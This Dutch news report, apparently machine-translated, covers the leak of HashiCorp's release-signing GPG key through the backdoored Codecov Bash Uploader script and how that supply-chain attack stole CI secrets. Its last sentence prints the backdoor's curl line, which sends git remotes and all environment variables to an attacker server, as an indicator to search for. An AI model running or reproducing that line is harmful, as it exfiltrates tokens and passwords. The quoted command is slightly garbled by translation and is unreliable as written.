HashiCorp, bekend van het ontwikkelen van de open source-tools Vagrant, Packer, Nomad en Terraform, kondigde het lekken aan van de privé-GPG-sleutel die wordt gebruikt om digitale handtekeningen te maken die releases verifiëren. Aanvallers die toegang hebben gekregen tot de GPG-sleutel kunnen mogelijk verborgen wijzigingen aanbrengen in HashiCorp-producten door deze te verifiëren met een correcte digitale handtekening. Tegelijkertijd verklaarde het bedrijf dat er tijdens de audit geen sporen zijn aangetroffen van pogingen om dergelijke wijzigingen aan te brengen.
Momenteel is de gecompromitteerde GPG-sleutel ingetrokken en is er een nieuwe sleutel voor in de plaats geïntroduceerd. Het probleem had alleen betrekking op de verificatie met behulp van de SHA256SUM- en SHA256SUM.sig-bestanden, en had geen invloed op het genereren van digitale handtekeningen voor Linux DEB- en RPM-pakketten die werden geleverd via releases.hashicorp.com, noch op de release-verificatiemechanismen voor macOS en Windows (AuthentiCode) .
Het lek ontstond door het gebruik van het Codecov Bash Uploader-script (codecov-bash) in de infrastructuur, ontworpen om dekkingsrapporten te downloaden van continue integratiesystemen. Tijdens de aanval op het bedrijf Codecov werd in het opgegeven script een achterdeur verborgen, waardoor wachtwoorden en coderingssleutels naar de server van de aanvaller werden verzonden.
Om te hacken maakten de aanvallers gebruik van een fout tijdens het maken van de Codecov Docker-image, waardoor het mogelijk werd toegangsgegevens naar GCS (Google Cloud Storage) te extraheren, die nodig waren om wijzigingen aan te brengen in het Bash Uploader-script dat vanuit de codecov werd gedistribueerd. io-website. De wijzigingen werden op 31 januari doorgevoerd, bleven twee maanden onopgemerkt en stelden aanvallers in staat informatie te extraheren die was opgeslagen in de continue integratiesysteemomgevingen van klanten. Met behulp van de toegevoegde kwaadaardige code konden aanvallers informatie verkrijgen over de geteste Git-repository en alle omgevingsvariabelen, inclusief tokens, coderingssleutels en wachtwoorden, verzonden naar continue integratiesystemen om de toegang tot applicatiecode, repository's en diensten zoals Amazon Web Services en GitHub te organiseren .
Naast de directe oproep werd het Codecov Bash Uploader-script gebruikt als onderdeel van andere uploaders, zoals Codecov-action (Github), Codecov-circleci-orb en Codecov-bitrise-step, waarvan de gebruikers ook last hebben van het probleem. Alle gebruikers van codecov-bash en aanverwante producten wordt aanbevolen om hun infrastructuur te controleren en wachtwoorden en coderingssleutels te wijzigen. Je kunt de aanwezigheid van een achterdeur in een script controleren door de aanwezigheid van de regel curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /uploaden/v2 || WAAR
Bron: opennet.ru